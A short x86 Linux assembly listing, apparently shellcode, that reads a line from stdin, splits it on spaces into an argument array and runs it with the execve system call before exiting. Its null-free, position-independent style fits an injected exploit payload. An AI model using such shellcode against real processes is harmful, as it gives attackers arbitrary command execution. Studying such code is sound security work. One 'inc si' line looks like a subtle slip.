   xor eax, eax

read:
   xor edx,edx
   mov dl, 255           ; 255 chars
   lea ecx, [esp - 255]  ; address of buffer
   xor ebx,ebx           ; 0 = stdin
   mov al,3h             ; 3 = read
   int 80h               ; switch to kernel-mode
   dec al
   mov [ecx + eax], ah

   xor eax, eax
   mov esi, ecx
   mov ebx, esi
   mov ecx, esp

findtoken:
   mov edi, esi		; edi points to the beginning

findloop:
   cmp byte [esi], ah	; NULL found?
   je  dolast

   cmp byte [esi], 20h	; find delimiter ' '
   je tokenfound	; esi points to the end

   inc esi
   jmp findloop

tokenfound:
; terminate the string
   mov byte [esi], ah
   lea edx, [edi]
   mov dword [ecx + eax], edx
   add al, 4
   inc si
   jmp findtoken

dolast:
   lea edx, [edi]
   mov dword [ecx + eax], edx
   xor edx,edx
   mov dword [ecx + eax + 4], edx

; call execve
   mov al, 0bh
   int 80h

; call exit
   mov al, 01h
   int 80h
